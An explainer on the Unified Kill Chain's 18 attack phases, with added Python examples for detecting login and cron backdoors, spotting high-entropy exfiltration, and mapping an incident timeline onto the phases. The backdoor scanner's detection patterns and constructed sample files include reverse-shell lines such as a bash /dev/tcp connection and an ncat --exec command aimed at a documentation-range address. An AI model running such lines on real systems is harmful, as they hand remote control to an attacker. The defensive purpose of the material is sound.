Unified Kill Chain
The Unified Kill Chain (UKC) was published in 2017 and updated in 2022. The UKC aims to complement, not compete with, other cyber security kill chain frameworks such as Lockheed Martin's Cyber Kill Chain and MITRE ATT&CK.
There are 18 phases to an attack in the UKC framework:
Reconnaissance
Weaponization
Delivery
Social Engineering
Exploitation
Persistence
Defense Evasion
Command & Control
Pivoting
Discovery
Privilege Escalation
Execution
Credential Access
Lateral Movement
Collection
Exfiltration
Impact
Objectives
Phase: In (Initial Foothold)
The main focus of this series of phases is for an attacker to gain access to a system or networked environment. An attacker will use numerous tactics to investigate the system for vulnerabilities that can be exploited to gain a foothold. This series of phases also covers the attacker establishing some form of persistence. Finally, the UKC accounts for the fact that attackers will often use a combination of these tactics rather than follow them in strict order.
Reconnaissance
This phase describes techniques that an adversary employs to gather information about their target through passive or active reconnaissance. Information gathered in this phase can include:
Discovering what systems and services are running on the target; this is useful information for the weaponization and exploitation phases.
Finding contact lists or lists of employees who can be impersonated or targeted in a social engineering or phishing attack.
Looking for potential credentials that may be of use in later stages, such as initial access or pivoting.
Understanding the network topology and identifying other networked systems that can be pivoted to.
Weaponization
This phase describes the preparatory activities an adversary carries out to set up the infrastructure required for the attack, for example standing up a command and control server or a system that catches reverse shells and hosts payloads.
Delivery
This phase describes techniques that result in the weaponized object (for example a phishing email or a malicious file) being transmitted to the target environment.
Social Engineering
This phase describes techniques that an adversary can employ to manipulate employees into performing actions that aid the adversary's attack. Examples below:
Getting a user to open a malicious attachment.
Impersonating a web page and having the user enter their credentials.
Calling or visiting the target and impersonating a user (for example, requesting a password reset), or gaining access to areas of a site that the attacker would not otherwise be able to reach (for example, by impersonating a utility engineer).
Exploitation
This phase describes how an attacker takes advantage of weaknesses or vulnerabilities present in a system. The UKC defines "Exploitation" as the abuse of vulnerabilities to achieve code execution. Examples below:
Uploading and executing a reverse shell through a web application.
Interfering with an automated script on the system so that it executes attacker-controlled code.
Abusing a web application vulnerability to execute code on the system it is running on.
Persistence
This phase describes the techniques an adversary uses to maintain access to a system on which they have gained an initial foothold. Examples below:
Creating a service on the target system that will allow the attacker to regain access.
Enrolling the target system with a Command & Control server so that commands can be executed remotely at any time.
Leaving other forms of backdoor that execute when a certain action occurs on the system (e.g. a reverse shell that runs when a system administrator logs in).
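The login-triggered and scheduled backdoors listed above leave traces in a small number of well-known places: login scripts, crontabs and service unit files. The following script is an added example, not part of the original page, that scans such files for reverse-shell indicators. The file paths, file contents, IP addresses (from the 203.0.113.0/24 documentation range) and the indicator patterns are all constructed for the example; the patterns are heuristics and will not catch every variant.

```python
import re
from dataclasses import dataclass

# Heuristic indicators of backdoors that fire on login or on a schedule.
# These patterns belong to this example; they are not an official UKC or
# ATT&CK artefact and will not catch every variant.
REVERSE_SHELL_PATTERNS = [
    (r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+", "bash /dev/tcp reverse shell"),
    (r"\bnc\b.*\s-e\s", "netcat -e reverse shell"),
    (r"\bncat\b.*\s--exec\b", "ncat --exec reverse shell"),
    (r"\bbase64\s+(?:-d|--decode)\b.*\|\s*(?:ba)?sh\b", "base64-decoded command piped to a shell"),
    (r"\bcurl\b.*\|\s*(?:ba)?sh\b", "curl output piped to a shell"),
    (r"\bpython3?\b.*\bsocket\b.*\b(?:subprocess|pty)\b", "python socket reverse shell"),
]

@dataclass
class Finding:
    path: str
    line_no: int
    reason: str
    text: str

def scan_lines(path, lines):
    """Return a Finding for every non-comment line matching an indicator."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for pattern, reason in REVERSE_SHELL_PATTERNS:
            if re.search(pattern, stripped):
                findings.append(Finding(path, line_no, reason, stripped))
                break  # one finding per line is enough
    return findings

def scan_persistence_locations(files):
    """files maps a path (login script, crontab, unit file) to its contents."""
    findings = []
    for path, contents in files.items():
        findings.extend(scan_lines(path, contents.splitlines()))
    return findings

# Constructed sample contents standing in for files collected from a host.
# 203.0.113.0/24 is a range reserved for documentation.
SAMPLE_FILES = {
    "/etc/profile.d/update-motd.sh": (
        "#!/bin/sh\n"
        "# print the message of the day\n"
        "cat /etc/motd\n"
        "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1 &\n"
    ),
    "/var/spool/cron/crontabs/root": (
        "0 3 * * * /usr/local/bin/backup.sh\n"
        "*/10 * * * * echo YmFzaCAtaQ== | base64 -d | sh\n"
    ),
    "/etc/systemd/system/updater.service": (
        "[Unit]\nDescription=Updater\n"
        "[Service]\nExecStart=/usr/bin/ncat --exec /bin/bash 203.0.113.5 4444\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
    "/home/admin/.bashrc": "alias ll='ls -la'\nexport PATH=$PATH:/opt/bin\n",
}

if __name__ == "__main__":
    for f in scan_persistence_locations(SAMPLE_FILES):
        print(f"{f.path}:{f.line_no}: {f.reason}: {f.text}")
```

Run against the constructed files it reports the login script, the crontab entry and the service unit, and leaves the clean .bashrc alone. In practice the file contents would come from a host collection (for example the output of a forensic triage script), and the pattern list would be extended with whatever the environment's own baseline shows to be unusual.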
Defense Evasion
This phase covers the techniques an adversary uses to evade the defensive measures in place on a system or network. The Defense Evasion phase is one of the more valuable phases in the UKC: when analysing an attack it helps shape the response, and it tells the defensive team how their defences were bypassed and therefore how to improve them. Examples of the defensive measures an adversary works to evade:
Web application firewalls.
Network firewalls.
Anti-virus systems on the target machine.
Intrusion detection systems.
Command & Control
This phase builds on the infrastructure the adversary prepared during the "Weaponization" phase to establish communications between the adversary and the target system. Once command and control is established, the adversary can work towards their action on objectives. For example, the adversary can:
Execute commands.
Steal data, credentials and other information.
Use the controlled system to pivot to other systems on the network.
Pivoting
Pivoting is the technique an adversary uses to reach other systems within a network that are not otherwise accessible. Many systems in a network are not directly reachable from the internet, and these often hold valuable data or have weaker security. For example, an adversary can use a publicly accessible web server as a stepping stone to attack other systems within the same network that are not reachable from the internet.
Phase: Through (Network Propagation)
This series of phases follows a successful foothold being established on the target network. The attacker seeks additional access and privileges to systems and data in order to fulfil their goals. They set up a base on one of the compromised systems to act as their pivot point and use it to gather information about the internal network.
Pivoting
Once the attacker has access to a system, they use it as their staging site and as a tunnel between their command operations and the victim's network. The system is also used as the distribution point for the malware and backdoors deployed at later stages.
Discovery
The adversary uncovers information about the system and the network it is connected to. Within this stage, their knowledge base is built from the active user accounts, the permissions granted, the applications and software in use, web browser activity, files, directories and network shares, and system configurations.
Privilege Escalation
After gathering this knowledge, the adversary looks to gain higher privileges on the pivot system. They leverage what they have learned about the accounts present, together with any vulnerabilities and misconfigurations found, to elevate their access to one of the following levels:
SYSTEM/ ROOT.
Local Administrator.
A user account with Admin-like access.
A user account with specific access or functions.
Execution
Using the pivot system as their host, the adversary deploys their malicious code. Remote access trojans, C2 scripts, malicious links and scheduled tasks are deployed and created to give the adversary a recurring presence on the system and uphold their persistence.
Credential Access
Working hand in hand with the Privilege Escalation stage, the adversary attempts to steal account names and passwords through various methods, including keylogging and credential dumping. Operating with legitimate credentials makes them harder to detect during the rest of the attack.
Lateral Movement
With the stolen credentials and elevated privileges, the adversary attempts to move through the network and onto other targeted systems to achieve their primary objective. The stealthier the technique used, the better.
Phase: Out (Action on Objectives)
This series of phases wraps up the adversary's attack on an environment: they now have access to critical assets and can fulfil their attack goals. These goals usually amount to compromising the confidentiality, integrity or availability (the CIA triad) of the organisation's assets.
Collection
In this phase, the adversary seeks to gather all the valuable data of interest. This compromises the confidentiality of the data and leads to the next attack stage, Exfiltration. The main target sources include drives, browsers, audio, video and email.
Exfiltration
To complete the compromise, the adversary seeks to steal the collected data. The data is typically compressed and encrypted before transfer so that content inspection cannot recognise it. The C2 channel and tunnel deployed in the earlier phases are used to carry it out of the network.
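Because exfiltrated data is compressed and encrypted, its bytes look close to uniformly random, which is something a defender can measure. The following script is an added example, not part of the original page: it computes the Shannon entropy of outbound payloads and flags destinations that receive a large volume of high-entropy data. The flows, host names and the 203.0.113.5 address are constructed for the example, and the "ciphertext" is a deterministic SHA-256 chain standing in for real encrypted data; the thresholds are illustrative and would be tuned per environment.

```python
import hashlib
import math
from collections import Counter, defaultdict

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty input, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

def simulated_ciphertext(size: int, seed: bytes) -> bytes:
    """Deterministic stand-in for compressed-and-encrypted data (constructed, not real traffic)."""
    out = bytearray()
    block = seed
    while len(out) < size:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:size])

def flag_exfiltration(flows, entropy_threshold=7.5, min_payload=1024, volume_threshold=20_000):
    """Return {destination: bytes} for destinations that received at least
    volume_threshold bytes of high-entropy payload.  flows is an iterable of
    (destination, payload_bytes) as a decrypting proxy or a capture of a
    cleartext channel would present them."""
    high_entropy_volume = defaultdict(int)
    for destination, payload in flows:
        if len(payload) >= min_payload and shannon_entropy(payload) >= entropy_threshold:
            high_entropy_volume[destination] += len(payload)
    return {d: v for d, v in high_entropy_volume.items() if v >= volume_threshold}

# Constructed flows.  203.0.113.0/24 is a range reserved for documentation.
SAMPLE_FLOWS = [
    # ordinary API traffic: printable JSON, low entropy
    ("api.example.com", b'{"status":"ok","items":[' + b'{"id":1,"name":"widget"},' * 80 + b']}'),
    # two large opaque uploads to an unknown host
    ("203.0.113.5", simulated_ciphertext(16384, b"chunk-1")),
    ("203.0.113.5", simulated_ciphertext(16384, b"chunk-2")),
    # a small opaque blob (e.g. a certificate bundle) that stays under the volume threshold
    ("updates.example.com", simulated_ciphertext(2048, b"bundle")),
]

if __name__ == "__main__":
    for destination, payload in SAMPLE_FLOWS:
        print(f"{destination:22} {len(payload):6} bytes  entropy={shannon_entropy(payload):.2f}")
    print("flagged:", flag_exfiltration(SAMPLE_FLOWS))
```

The check only means something where the payload is visible: at a TLS-terminating proxy, or on channels such as DNS or ICMP that adversaries use as covert tunnels. On the bare wire every TLS session is already high entropy, so in practice the entropy score is combined with destination reputation, per-host volume baselines and the C2 indicators gathered in the earlier phases rather than used on its own.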
Impact
If the adversary seeks to compromise the integrity or availability of data assets, they manipulate, interrupt or destroy those assets. The goal is to disrupt business and operational processes, and this may involve removing account access, wiping disks, encrypting data (ransomware), defacement and denial of service (DoS) attacks.
Objectives
With all the power and access to the systems and network, the adversary would seek to achieve their strategic goal for the attack.
For example, if the attack was financially motivated, they may seek to encrypt files and systems with ransomware and ask for payment to release the data. In other instances, the attacker may seek to damage the reputation of the business, and they would release private and confidential information to the public.
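One practical use of the framework is to lay an incident timeline over the 18 phases and the three series of phases (In, Through and Out) described above, to see how far the adversary got, where the evidence is missing and where they doubled back. The following script is an added example, not part of the original page or of the UKC itself. The timeline is constructed for the example; the placement of Pivoting in the Through series is this example's choice, following the page's treatment of it as the start of network propagation.

```python
from collections import OrderedDict

# The 18 UKC phases in the order listed above, each assigned to one of the
# three series of phases (In / Through / Out).  Pivoting is placed in Through
# here because the page treats it as the start of network propagation.
UKC_PHASES = OrderedDict([
    ("Reconnaissance", "In"), ("Weaponization", "In"), ("Delivery", "In"),
    ("Social Engineering", "In"), ("Exploitation", "In"), ("Persistence", "In"),
    ("Defense Evasion", "In"), ("Command & Control", "In"),
    ("Pivoting", "Through"), ("Discovery", "Through"),
    ("Privilege Escalation", "Through"), ("Execution", "Through"),
    ("Credential Access", "Through"), ("Lateral Movement", "Through"),
    ("Collection", "Out"), ("Exfiltration", "Out"), ("Impact", "Out"),
    ("Objectives", "Out"),
])
PHASE_INDEX = {phase: i for i, phase in enumerate(UKC_PHASES)}

# Constructed incident timeline: timestamp | UKC phase | analyst note.
# Hosts and the 203.0.113.5 address are fictional.
SAMPLE_TIMELINE = """
2024-03-01T09:02Z|Delivery|phishing mail with macro-enabled invoice attachment
2024-03-01T09:10Z|Social Engineering|user enabled macros on the attachment
2024-03-01T09:10Z|Exploitation|macro spawned powershell.exe with an encoded command
2024-03-01T09:11Z|Command & Control|periodic HTTPS beacon to 203.0.113.5
2024-03-01T09:30Z|Discovery|net group "domain admins" /domain
2024-03-01T10:05Z|Credential Access|lsass.exe memory read by an unsigned binary
2024-03-01T10:40Z|Lateral Movement|SMB admin share access to FILESRV01
2024-03-01T10:42Z|Discovery|share enumeration on FILESRV01
2024-03-01T11:30Z|Collection|7z archive staged in C:\\Windows\\Temp
2024-03-01T11:45Z|Exfiltration|32 MB upload to 203.0.113.5
"""

def parse_timeline(text):
    """Parse 'timestamp|phase|note' lines into (timestamp, phase, note) tuples."""
    events = []
    for line in text.strip().splitlines():
        fields = [field.strip() for field in line.split("|", 2)]
        if len(fields) != 3:
            raise ValueError(f"malformed timeline line: {line!r}")
        timestamp, phase, note = fields
        if phase not in PHASE_INDEX:
            raise ValueError(f"unknown UKC phase: {phase!r}")
        events.append((timestamp, phase, note))
    return events

def furthest_phase(events):
    """The phase furthest along the chain for which there is evidence."""
    return max((phase for _, phase, _ in events), key=PHASE_INDEX.get)

def furthest_series(events):
    """Which of In / Through / Out the attack has reached."""
    return UKC_PHASES[furthest_phase(events)]

def evidence_gaps(events):
    """Phases before the furthest one with no evidence.  The adversary is
    likely to have passed through several of them, so this is the
    investigator's to-do list."""
    seen = {phase for _, phase, _ in events}
    limit = PHASE_INDEX[furthest_phase(events)]
    return [p for p, i in PHASE_INDEX.items() if i < limit and p not in seen]

def loops(events):
    """Consecutive events where the adversary returned to an earlier phase,
    e.g. running Discovery again after Lateral Movement onto a new host."""
    return [(prev, cur) for (_, prev, _), (_, cur, _) in zip(events, events[1:])
            if PHASE_INDEX[cur] < PHASE_INDEX[prev]]

if __name__ == "__main__":
    events = parse_timeline(SAMPLE_TIMELINE)
    print("furthest phase:", furthest_phase(events), "in series", furthest_series(events))
    print("phases with no evidence yet:", ", ".join(evidence_gaps(events)))
    print("returns to earlier phases:", loops(events))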